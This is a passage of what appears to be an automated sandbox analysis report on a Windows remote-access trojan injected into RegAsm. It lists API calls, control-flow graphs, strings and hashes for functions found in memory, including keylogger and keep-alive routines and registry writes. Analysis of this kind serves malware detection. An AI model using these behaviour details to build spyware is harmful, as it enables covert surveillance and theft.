                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                  Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1402 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1413 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1402->1413 1414 41b3ee-41b3f7 1402->1414 1424 41b3e6-41b3e9 call 401fd8 1413->1424 1425 41b3da-41b3e3 call 41cffa 1413->1425 1415 41b400 1414->1415 1416 41b3f9-41b3fe 1414->1416 1418 41b405-41b410 call 40537d 1415->1418 1416->1418 1424->1414 1425->1424
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 3f67e54296d7e2c924aadc0e9923d858110a08a4befc92e0570a0970493cb547
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 3f67e54296d7e2c924aadc0e9923d858110a08a4befc92e0570a0970493cb547
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1476 40a6b0-40a6c0 1477 40a6c6-40a6c8 1476->1477 1478 40a75d-40a760 1476->1478 1479 40a6cb-40a6f1 call 401f04 CreateFileW 1477->1479 1482 40a731 1479->1482 1483 40a6f3-40a701 GetFileSize 1479->1483 1484 40a734-40a738 1482->1484 1485 40a703 1483->1485 1486 40a728-40a72f CloseHandle 1483->1486 1484->1479 1487 40a73a-40a73d 1484->1487 1488 40a705-40a70b 1485->1488 1489 40a70d-40a714 1485->1489 1486->1484 1487->1478 1492 40a73f-40a746 1487->1492 1488->1486 1488->1489 1490 40a716-40a718 call 40b117 1489->1490 1491 40a71d-40a722 Sleep 1489->1491 1490->1491 1491->1486 1492->1478 1494 40a748-40a758 call 409097 call 40a1b4 1492->1494 1494->1478
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                  Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$NG
                                                  • API String ID: 180926312-2721294649
                                                  • Opcode ID: 8033d7c0323991a8c44f66dfc59215900a10c49b8716d1ce4b95416d8ef397f7
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: 8033d7c0323991a8c44f66dfc59215900a10c49b8716d1ce4b95416d8ef397f7
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                  • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                  Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                  Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                  • RegQueryValueExA.KERNEL32 ref: 00413768
                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                  Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                  Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                  • RegQueryValueExA.KERNEL32 ref: 00413565
                                                  • RegCloseKey.KERNEL32(?), ref: 00413570
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                  Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                  • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                  Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID:
                                                  • API String ID: 1807457897-3916222277
                                                  • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                  • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                  • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                  • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                  Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: pQG
                                                  • API String ID: 176396367-3769108836
                                                  • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                  • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                  Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: String
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2568140703-3893581201
                                                  • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                  • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                  • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                  • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                  Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                  Strings
                                                  • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpin
                                                  • String ID: InitializeCriticalSectionEx
                                                  • API String ID: 2593887523-3084827643
                                                  • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                  • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                  • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                  • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                  Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Alloc
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2773662609-671089009
                                                  • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                  • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                  • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                  • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                  Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2742660187-671089009
                                                  • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                  • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
